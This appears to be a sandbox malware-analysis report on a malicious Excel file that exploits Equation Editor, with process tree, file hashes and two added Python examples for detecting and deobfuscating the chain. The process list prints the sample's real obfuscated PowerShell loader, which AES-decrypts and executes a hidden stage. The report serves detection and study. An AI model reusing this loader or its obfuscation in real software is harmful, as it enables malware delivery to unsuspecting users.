Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/07/2024, 11:01

General

  • Target

    AWD 490104998518.xls

  • Size

    1.2MB

  • MD5

    f63c009bccbc4d8d26d162a168feaeb1

  • SHA1

    fa8ab13582703932f968a31e6cc0973e45ca43e0

  • SHA256

    f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3

  • SHA512

    56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395

  • SSDEEP

    24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Abuses OpenXML format to download file from external location
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
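
The Equation Editor signature is most useful as a lineage rule. EQNEDT32.EXE is started as a COM server (the -Embedding switch in the process list), so it sits at the top level of the tree rather than under WINWORD.EXE, and anything it spawns is the exploit's payload, not normal Office behaviour. The following is an added example of that check, not Triage's own signature logic: Python over constructed process-creation events modelled on the chain in this report. The svchost.exe and explorer.exe parents with PIDs 600 and 1200 are hypothetical, and the PowerShell command line is shortened to its wrapper.

```python
"""Lineage and command-line rules for the EQNEDT32 -> WScript -> PowerShell chain.
Added example; the events at the bottom are constructed to mirror this report."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")
Alert = namedtuple("Alert", "rule pid lineage")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Markers of the wrapper seen in this report: char-code arithmetic fed to -creplace,
# and Invoke-Expression reached through an alias built from $VerbosePreference.
OBFUSCATION_MARKERS = [
    r"-c?replace\s*\(?\s*\[char\]",
    r"\[char\]\d+\s*\+\s*\[char\]\d+",
    r"\$verbosepreference\.tostring\(\)\[",
    r"invoke-expression|\biex\b",
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid, pid):
    """Walk ppid links back to the root we know about; returns root-first image names."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def evaluate(events):
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        name = image_name(ev.image)
        parent = by_pid.get(ev.ppid)
        pname = image_name(parent.image) if parent else ""
        chain = lineage(by_pid, ev.pid)
        # Equation Editor was removed from Office by Microsoft in 2018, so any start is
        # worth a look. It is activated via DCOM (-Embedding), so the parent is a
        # svchost rather than the Office process: key the rule on the image itself.
        if name == "eqnedt32.exe":
            alerts.append(Alert("equation_editor_launched", ev.pid, chain))
        # EQNEDT32 has no legitimate reason to create processes; CVE-2017-11882-style
        # exploitation does exactly that.
        if pname == "eqnedt32.exe":
            alerts.append(Alert("eqnedt32_spawns_child", ev.pid, chain))
        if pname in SCRIPT_HOSTS and name in SHELLS:
            alerts.append(Alert("script_host_spawns_shell", ev.pid, chain))
        if name in ("powershell.exe", "pwsh.exe"):
            hits = [m for m in OBFUSCATION_MARKERS if re.search(m, ev.cmdline, re.I)]
            if len(hits) >= 2:   # one marker alone is noisy; the wrapper trips all four
                alerts.append(Alert("obfuscated_powershell", ev.pid, chain))
    return alerts


# Constructed stand-in for the report's command line: wrapper only, body shortened.
PS_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command '
    "(('((e4jTMIx = 1e4j)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 "
    "-CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"
)

# Constructed events (PIDs 600/1200 and their parents are hypothetical).
SAMPLE_EVENTS = [
    Event(600, 4, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    Event(1200, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(1760, 1200, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
          r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"'),
    Event(2536, 600, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
          r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding'),
    Event(1784, 2536, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    Event(1708, 600, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
          r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    Event(780, 1708, r"C:\Windows\SysWOW64\WScript.exe",
          r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"'),
    Event(1028, 780, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMDLINE),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a.rule:26} pid={a.pid:<5} {' -> '.join(a.lineage)}")
```

Run against the constructed events this yields four alerts (EQNEDT32 start, EQNEDT32 spawning WScript, WScript spawning PowerShell, obfuscated PowerShell command line) and nothing for EXCEL.EXE, WINWORD.EXE or splwow64.exe; the lineage printed for the PowerShell alert is svchost.exe -> eqnedt32.exe -> wscript.exe -> powershell.exe, which is the chain to pivot on in EDR telemetry.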

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1760
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1784
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1028
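
The powershell.exe command line above is two nested layers of the same trick: a single-quoted literal, split with '+' concatenation, in which placeholder tokens stand for the characters the script needs (outer layer: e4j for the quote, and AQM, built as [Char]65+[Char]81+[Char]77, for the pipe; inner layer: CnI for the double quote and TMI for $), then handed to Invoke-Expression through an alias assembled from $VerbosePreference ("SilentlyContinue"[1,3] + 'x' = iex). What finally runs is Decrypt-AESEncryption: AES-256-CBC with key = SHA256(passphrase), the IV taken from the first 16 bytes of the base64 blob, zero padding, and the plaintext passed to Invoke-Expression once more. Below is an added Python deobfuscator, not part of the report, that peels both layers and derives the AES parameters the same way the script does. The command and blob it runs on are constructed stand-ins (the report's blob is elided), and the final decrypt step assumes the `cryptography` package is installed.

```python
"""Peel the layered PowerShell obfuscation seen in this report and recover the
Decrypt-AESEncryption inputs. Added example; the sample command is constructed."""
import base64
import hashlib
import re

# Each layer is (1) PowerShell string concatenation 'a'+'b', then (2) token-for-character
# replacement. Tokens and targets are the ones visible in the report's command line.
LAYERS = [
    {"e4j": chr(39), "AQM": chr(124)},   # outer: -CREplacE 'e4j',[Char]39 / ([Char]65+81+77),[Char]124
    {"CnI": chr(34), "TMI": chr(36)},    # inner: ([CHar]67+110+73),[CHar]34 / 'TMI',[CHar]36
]

# Greedy, so the trailing  -creplace 'e4j',[Char]39  operands stay outside the payload.
LITERAL_RE = re.compile(r"\(\('(.*)'\)\s*-c?replace\b", re.S | re.I)


def extract_literal(expr):
    """Return the single-quoted payload of  (('...') -creplace ...)."""
    m = LITERAL_RE.search(expr)
    if not m:
        raise ValueError("no (('...') -creplace wrapper found")
    return m.group(1)


def peel(literal, tokens):
    text = literal.replace("'+'", "")          # 'abc'+'def' -> abcdef
    for needle, char in tokens.items():
        text = text.replace(needle, char)
    return text


def deobfuscate(cmdline):
    text = cmdline
    for tokens in LAYERS:
        text = peel(extract_literal(text), tokens)
    return text


def resolve_invoker(verbose_preference="SilentlyContinue"):
    """$verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join''  ->  'i'+'e'+'x'
    ($VerbosePreference defaults to SilentlyContinue), i.e. the Invoke-Expression alias."""
    return verbose_preference[1] + verbose_preference[3] + "x"


def stage_parameters(script):
    """Pull the Decrypt-AESEncryption inputs out of the recovered script and derive the
    key as the script does: AES-256 key = SHA256(UTF8(passphrase)), IV = first 16 bytes
    of the base64 blob, rest = ciphertext (PaddingMode.Zeros)."""
    passphrase = re.search(r'\$chave\s*=\s*"([^"]*)"', script).group(1)
    b64 = re.search(r'\$textoCriptografadoBase64\s*=\s*"([^"]*)"', script).group(1)
    blob = base64.b64decode(b64)
    return {
        "passphrase": passphrase,
        "aes_key": hashlib.sha256(passphrase.encode("utf-8")).digest(),
        "iv": blob[:16],
        "body": blob[16:],
    }


def decrypt_stage(script):
    """AES-256-CBC decrypt of the embedded blob (assumes the `cryptography` package);
    mirrors TransformFinalBlock(cipherBytes, 16, len-16) followed by Trim([char]0)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    p = stage_parameters(script)
    dec = Cipher(algorithms.AES(p["aes_key"]), modes.CBC(p["iv"])).decryptor()
    plain = dec.update(p["body"]) + dec.finalize()
    return plain.decode("utf-8", errors="replace").strip("\x00")


# Constructed stand-in for the report's command line: same wrapper and tokens, a short
# body instead of the full Decrypt-AESEncryption function, and a made-up blob.
SAMPLE_BLOB_B64 = base64.b64encode(b"0123456789abcdef" + b"CONSTRUCTED-BODY").decode()
SAMPLE_CMD = (
    "powershell.exe -command (('((e4jTMIchave = CnIk3yCnI;TMItextoCriptografadoBase64 = CnI"
    + SAMPLE_BLOB_B64
    + "CnI;TMItextoDescriptografado = Decrypt-AESEnc'+'ryption -Base64Text "
    "TMItextoCriptografadoBase64 -Key TMIchave;Invoke-Expressioe4j+e4jn "
    "TMItextoDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+[CHar]73),[CHar]34 "
    "-cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 "
    "-CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"
)

if __name__ == "__main__":
    script = deobfuscate(SAMPLE_CMD)
    print("invoker :", resolve_invoker())
    print("script  :", script)
    p = stage_parameters(script)
    print("aes key :", p["aes_key"].hex())
    print("iv      :", p["iv"], "ciphertext bytes:", len(p["body"]))
```

On a real command line, paste the whole -command argument into deobfuscate() and call decrypt_stage() on the result; the order inside each layer matters, since the '+' joins are evaluated before the -creplace operators, and the inner layer's joins only appear as e4j+e4j until the outer layer has been peeled.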

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7BD7F3F9-6CF2-4A4A-BC63-46B9EAC2ED1D}.FSD

      Filesize

      128KB

      MD5

      50c03fa16fdf5a8dc024333c4d6322f8

      SHA1

      222367043a1b6afc0a895a6e56f6a63d598aac86

      SHA256

      1b2f97568ba5a2edc394f7106fb2549f2db3f26334fe5a816f12b1c2915e0ae8

      SHA512

      8edf05a191797c4be178334ee390794a52565bf9e923367f5bd6e7052e9fc34f2e48dd94913237661dc3b85b57fa67ca53bbe75e29a11a4388fa5045eb4e77ff

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      06affedb3acc140be7fa458b6485a664

      SHA1

      44394b6dc8abdf00f3ac4e38ea52c807b45a655b

      SHA256

      454678244de989a1c49b4bfdbc4581c864364f81dedc3f97b39a0ef8c232b18a

      SHA512

      697e584f399a1608daa92b41a761cbea345356d91b7119bb7726937b424747664df6802e86820d56fb66c6a83526a64b02e7ce58a596102a163af5bee6685b22

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DB1EAE14-EBAB-4E09-A703-847628820889}.FSD

      Filesize

      128KB

      MD5

      1d480e311ca4db15b0d02303767869ba

      SHA1

      86a1d83bc1ae7513c54a8f73aa8127a6a414c004

      SHA256

      0840c3e53855eb156e0f4c0d3d0923e78ce0da65409f974723cd413ec00a4868

      SHA512

      3dcea1b828e006217439476780c09d7cd8c17d5820419ad3ba45df5b2e5c0714c03c9068d41723c8fa26979975bd71b6d596104653d150da8a73e25c9e578168

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc

      Filesize

      83KB

      MD5

      e03f3290788de4d7a103f16b780b3cce

      SHA1

      c220e79a2714ed59f4d7b1d0a4f6c63a03772ea6

      SHA256

      db4fed8fb3c35582ade2fa57a5866ec7795e94bff34f004f66d15233d1a2fcd8

      SHA512

      9372b124ecb895a5c7672d75d17eb3ea3d91fab5ed675aa82090d8d00c15cb4477553342a356c4f8616869c2987105e6468bb2a912196dab055e06e34ad24b63

    • C:\Users\Admin\AppData\Local\Temp\{1D57E044-7616-45D9-AAF4-163CA8B4DACE}

      Filesize

      128KB

      MD5

      75a65fd301e7502f04f4e1283667ec0f

      SHA1

      880133e60c726ba309f61c970678da2fcefb7346

      SHA256

      6722282816329e4c984c07ce9fc8ef5253c1b568121fe8f65fb4c21c1fa58301

      SHA512

      ef8f8d6fca21f478629089b98661590e6f8960291385a24e511846cf232f54aadeccb6d28578bcd6129a85887b1fa02039386b620b696ccfbd47cc4f65fc7eaa

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      acf86365f0b275c45dde8e7b3b4310ff

      SHA1

      fc440f05f848894b685ea253a3cac557274b94e7

      SHA256

      9b71bb48753fc95d6afb442ed1376ce45662e84c06b2ebebb07938e209b017d5

      SHA512

      b14fdf898bd95b4f42ae3657122340a958c16eae64b934e9641818174fdaa63110c26de9d6ce59d201d5b6e34a641c5e15aa94a750a99703af888651dc075859

    • C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS

      Filesize

      409KB

      MD5

      94734cb139b6b9025fd8a1acc56027db

      SHA1

      b385368bcaadaca073849a413660b68e690ffba5

      SHA256

      7dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08

      SHA512

      58e0064f4b304b5503c4a7e689d96cc62bac4bc8ee76d39fede408b9e777b9602334dad4e1570fa0b9e0c363e7d8ee419a41d4da02493d174d61f96acca4053f

    • memory/1760-92-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/1760-8-0x0000000002E20000-0x0000000002E22000-memory.dmp

      Filesize

      8KB

    • memory/1760-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1760-1-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-7-0x00000000036A0000-0x00000000036A2000-memory.dmp

      Filesize

      8KB

    • memory/2536-5-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-93-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB

    • memory/2536-3-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/2536-116-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2536-117-0x0000000072A0D000-0x0000000072A18000-memory.dmp

      Filesize

      44KB